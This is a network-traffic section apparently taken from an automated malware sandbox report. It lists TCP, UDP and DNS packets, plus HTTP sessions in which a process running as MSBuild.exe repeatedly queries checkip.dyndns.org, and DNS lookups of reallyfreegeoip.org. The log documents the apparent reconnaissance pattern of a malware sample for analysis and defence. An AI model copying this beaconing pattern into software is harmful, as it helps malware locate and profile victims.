Nov 8, 2024 16:16:14.826961994 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.826980114 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.827421904 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.827428102 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.954658031 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.954710960 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.954765081 CET	62063	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.954772949 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.954817057 CET	62063	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.955183983 CET	62063	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.955207109 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.955223083 CET	62063	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.955229044 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.957819939 CET	62067	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.957859993 CET	443	62067	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.957926035 CET	62067	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.958065033 CET	62067	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.958074093 CET	443	62067	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.063970089 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.063992977 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.064013004 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.064097881 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.064126968 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.064155102 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.064197063 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.072145939 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.072201014 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.072221041 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.072247028 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.072262049 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.072283983 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.072379112 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.072386026 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.072402000 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.072572947 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.072602034 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.072634935 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.075089931 CET	62068	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.075139999 CET	443	62068	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.075205088 CET	62068	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.075340986 CET	62068	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.075356007 CET	443	62068	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.084644079 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.084778070 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.084806919 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.084825039 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.084887028 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.084919930 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.084974051 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.085232019 CET	62065	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.085258007 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.085702896 CET	62065	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.085709095 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.088818073 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.088891983 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.088905096 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.088941097 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.089031935 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.089051962 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.089066029 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.089072943 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.091886044 CET	62069	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.091923952 CET	443	62069	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.092006922 CET	62069	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.092170000 CET	62069	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.092184067 CET	443	62069	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.216407061 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.216449022 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.216609001 CET	62065	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.216658115 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.216701984 CET	62065	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.216849089 CET	62065	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.216854095 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.216866970 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.216880083 CET	62065	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.216937065 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.219468117 CET	62070	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.219518900 CET	443	62070	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.219611883 CET	62070	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.219774961 CET	62070	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.219785929 CET	443	62070	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.531748056 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.532205105 CET	62066	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.532248020 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.532649040 CET	62066	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.532654047 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.664634943 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.664661884 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.664710999 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.664726973 CET	62066	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.664762974 CET	62066	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.664954901 CET	62066	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.664974928 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.664984941 CET	62066	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.664989948 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.667644978 CET	62071	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.667694092 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.667768002 CET	62071	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.667896986 CET	62071	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.667920113 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.686780930 CET	443	62067	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.687203884 CET	62067	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.687227011 CET	443	62067	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.687856913 CET	62067	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.687869072 CET	443	62067	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.806180000 CET	443	62068	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.806757927 CET	62068	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.806786060 CET	443	62068	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.807212114 CET	62068	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.807218075 CET	443	62068	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.830882072 CET	443	62067	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.830952883 CET	443	62067	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.831011057 CET	62067	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.831572056 CET	62067	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.831597090 CET	443	62067	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.831609964 CET	62067	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.831615925 CET	443	62067	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.834229946 CET	62072	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.834280968 CET	443	62072	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.834368944 CET	62072	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.834528923 CET	62072	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.834543943 CET	443	62072	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.834654093 CET	443	62069	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.834969997 CET	62069	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.835000992 CET	443	62069	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.835422039 CET	62069	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.835431099 CET	443	62069	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.935889959 CET	443	62068	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.936163902 CET	443	62068	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.936290026 CET	62068	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.938355923 CET	62068	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.938355923 CET	62068	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.938384056 CET	443	62068	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.938395023 CET	443	62068	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.938858986 CET	62073	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.938896894 CET	443	62073	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.938994884 CET	62073	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.939177990 CET	62073	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.939193964 CET	443	62073	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.950517893 CET	443	62070	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.954061985 CET	62070	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.954085112 CET	443	62070	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.954575062 CET	62070	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.954581022 CET	443	62070	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.967715979 CET	443	62069	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.967782021 CET	443	62069	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.967855930 CET	62069	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.968022108 CET	62069	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.968040943 CET	443	62069	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.968053102 CET	62069	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.968059063 CET	443	62069	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.971055031 CET	62074	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.971112967 CET	443	62074	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:15.971184015 CET	62074	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.971354961 CET	62074	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:15.971368074 CET	443	62074	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.079849005 CET	443	62070	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.079937935 CET	443	62070	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.080008030 CET	62070	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.080174923 CET	62070	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.080199003 CET	443	62070	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.080213070 CET	62070	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.080218077 CET	443	62070	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.088125944 CET	62075	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.088159084 CET	443	62075	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.088243961 CET	62075	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.088557959 CET	62075	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.088570118 CET	443	62075	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.401781082 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.402333975 CET	62071	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.402359962 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.402796984 CET	62071	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.402803898 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.531600952 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.531629086 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.531677008 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.531696081 CET	62071	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.531738043 CET	62071	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.531981945 CET	62071	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.532001019 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.532012939 CET	62071	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.532017946 CET	443	62071	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.592012882 CET	443	62072	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.592708111 CET	62072	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.592739105 CET	443	62072	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.593178034 CET	62072	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.593183041 CET	443	62072	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.699207067 CET	443	62074	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.699943066 CET	62074	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.699971914 CET	443	62074	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.700654030 CET	62074	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.700659990 CET	443	62074	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.709631920 CET	443	62073	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.710208893 CET	62073	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.710222960 CET	443	62073	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.710757971 CET	62073	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.710764885 CET	443	62073	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.723329067 CET	443	62072	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.723398924 CET	443	62072	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.723443031 CET	62072	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.723581076 CET	62072	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.723596096 CET	443	62072	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.723607063 CET	62072	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.723613024 CET	443	62072	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.818295956 CET	443	62075	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.818834066 CET	62075	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.818861008 CET	443	62075	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.819293976 CET	62075	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.819298983 CET	443	62075	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.828960896 CET	443	62074	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.829068899 CET	443	62074	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.829129934 CET	62074	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.829226971 CET	62074	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.829246044 CET	443	62074	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.829261065 CET	62074	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.829266071 CET	443	62074	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.845417023 CET	443	62073	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.845474958 CET	443	62073	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.845532894 CET	62073	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.845784903 CET	62073	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.845804930 CET	443	62073	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.845818043 CET	62073	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.845824003 CET	443	62073	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.947247982 CET	443	62075	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.947514057 CET	443	62075	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.947607994 CET	62075	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.947642088 CET	62075	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.947642088 CET	62075	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:16.947659969 CET	443	62075	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:16.947669983 CET	443	62075	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:34.116204977 CET	80	49720	158.101.44.242	192.168.2.10
Nov 8, 2024 16:16:34.116296053 CET	49720	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:16:40.262563944 CET	80	49759	158.101.44.242	192.168.2.10
Nov 8, 2024 16:16:40.262658119 CET	49759	80	192.168.2.10	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 16:15:24.108922005 CET	55203	53	192.168.2.10	1.1.1.1
Nov 8, 2024 16:15:24.157196045 CET	53	55203	1.1.1.1	192.168.2.10
Nov 8, 2024 16:15:25.119968891 CET	60119	53	192.168.2.10	1.1.1.1
Nov 8, 2024 16:15:25.131390095 CET	53	60119	1.1.1.1	192.168.2.10
Nov 8, 2024 16:15:54.040370941 CET	53	61667	162.159.36.2	192.168.2.10
Nov 8, 2024 16:15:54.695875883 CET	59643	53	192.168.2.10	1.1.1.1
Nov 8, 2024 16:15:54.703178883 CET	53	59643	1.1.1.1	192.168.2.10
Nov 8, 2024 16:15:56.701457977 CET	63543	53	192.168.2.10	1.1.1.1
Nov 8, 2024 16:15:56.708961010 CET	53	63543	1.1.1.1	192.168.2.10
Nov 8, 2024 16:15:59.126957893 CET	53	54288	162.159.36.2	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 8, 2024 16:15:24.108922005 CET	192.168.2.10	1.1.1.1	0x1365	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:25.119968891 CET	192.168.2.10	1.1.1.1	0x5713	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:54.695875883 CET	192.168.2.10	1.1.1.1	0xb3d5	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Nov 8, 2024 16:15:56.701457977 CET	192.168.2.10	1.1.1.1	0x983e	Standard query (0)	197.87.175.4.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 8, 2024 16:15:24.157196045 CET	1.1.1.1	192.168.2.10	0x1365	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 8, 2024 16:15:24.157196045 CET	1.1.1.1	192.168.2.10	0x1365	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:24.157196045 CET	1.1.1.1	192.168.2.10	0x1365	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:24.157196045 CET	1.1.1.1	192.168.2.10	0x1365	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:24.157196045 CET	1.1.1.1	192.168.2.10	0x1365	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:24.157196045 CET	1.1.1.1	192.168.2.10	0x1365	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:25.131390095 CET	1.1.1.1	192.168.2.10	0x5713	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:25.131390095 CET	1.1.1.1	192.168.2.10	0x5713	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:25.252008915 CET	1.1.1.1	192.168.2.10	0x4861	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 8, 2024 16:15:25.252008915 CET	1.1.1.1	192.168.2.10	0x4861	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:38.032135963 CET	1.1.1.1	192.168.2.10	0xbbda	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:38.032135963 CET	1.1.1.1	192.168.2.10	0xbbda	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:52.026175022 CET	1.1.1.1	192.168.2.10	0x7940	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:52.026175022 CET	1.1.1.1	192.168.2.10	0x7940	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 8, 2024 16:15:54.703178883 CET	1.1.1.1	192.168.2.10	0xb3d5	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Nov 8, 2024 16:15:56.708961010 CET	1.1.1.1	192.168.2.10	0x983e	Name error (3)	197.87.175.4.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49706	158.101.44.242	80	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:24.239162922 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:24.876744986 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 19fc0298d733e11d80023f7a7732bfff Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Nov 8, 2024 16:15:24.882141113 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 8, 2024 16:15:25.027651072 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 66a153b8c43775a785d53242d09f52e1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Nov 8, 2024 16:15:26.086036921 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 8, 2024 16:15:26.235488892 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:26 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 28b1072815b3438a8294e61f9446b52a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49711	158.101.44.242	80	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:27.038906097 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
